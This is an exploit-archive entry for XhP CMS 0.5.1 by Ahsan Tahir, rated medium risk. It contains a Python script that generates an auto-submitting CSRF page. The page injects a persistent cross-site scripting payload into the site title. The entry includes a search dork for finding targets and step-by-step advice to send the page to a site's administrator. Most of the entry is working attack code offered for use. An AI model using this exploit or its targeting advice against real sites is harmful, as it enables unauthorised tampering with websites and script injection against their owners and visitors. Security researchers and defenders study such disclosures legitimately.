XhP CMS 0.5.1 Cross Site Request Forgery / Cross Site Scripting

2016.10.20
Credit: Ahsan Tahir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-352
Dork: inurl:Powered by XHP CMS

# Exploit Title: XhP CMS 0.5.1 - Cross-Site Request Forgery to Persistent Cross-Site Scripting # Exploit Author: Ahsan Tahir # Date: 19-10-2016 # Software Link: https://sourceforge.net/projects/xhp/ # Vendor: https://sourceforge.net/projects/xhp/ # Google Dork: inurl:Powered by XHP CMS # Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial # Website: www.ahsan-tahir.com # Category: webapps # Version: 0.5.1 # Tested on: [Kali Linux 2.0 | Windows 8.1] # Email: mrahsan1337@gmail.com import os import urllib if os.name == 'nt': os.system('cls') else: os.system('clear') banner = ''' +-==-==-==-==-==-==-==-==-==-==-==-==-==-=-=-=+ | __ ___ ____ ____ __ __ ____ | | / / |__ | _ / ___| / / ___| | | /| '_ | |_) | | | | |/| ___ | | / | | | | __/ | |___| | | |___) | | | /_/__| |_|_| ____|_| |_|____/ | | > XhP CMS 0.5.1 - CSRF to Persistent XSS | | > Exploit Author & Script Coder: Ahsan Tahir| +=====-----=====-----======-----=====---==-=-=+ ''' def xhpcsrf(): print banner url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://): ")) csrfhtmlcode = ''' <html> <!-- CSRF PoC --> <body> <form action="http://%s/action.php?module=users&action=process_general_config&box_id=29&page_id=0&basename=index.php&closewindow=&from_page=page=0&box_id=29&action=display_site_settings&errcode=0" method="POST" enctype="multipart/form-data" name="exploit"> <input type="hidden" name="frmPageTitle" value="&quot;accesskey&#61;z&#32;onclick&#61;&quot;alert&#40;document&#46;domain&#41;" /> <input type="hidden" name="frmPageUrl" value="http&#58;&#47;&#47;localhost&#47;xhp&#47;" /> <input type="hidden" name="frmPageDescription" value="&#13;" /> <input type="hidden" name="frmLanguage" value="english" /> <input type="submit" value="Submit request" /> </form> <script type="text/javascript" language="JavaScript"> //submit form document.exploit.submit(); </script> </body> </html> ''' % url print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created." print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n") extension = ".html" name = raw_input(" Filename: ") filename = name+extension file = open(filename, "w") file.write(csrfhtmlcode) file.close() print(" [+] Your exploit is saved as %s")%filename print(" [+] Further Details:\n [!] The code saved in %s will automatically submit without\n any user interaction\n [!] To fully exploit, send the admin of this site a webpage with\n the above code injected in it, when he/she will open it the\n title of their website will be\n changed to an XSS payload, and then\n go to %s and hit ALT+SHIFT+Z on your keyboard, boom! XSS will pop-up!") %(filename, url) print("") xhpcsrf()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top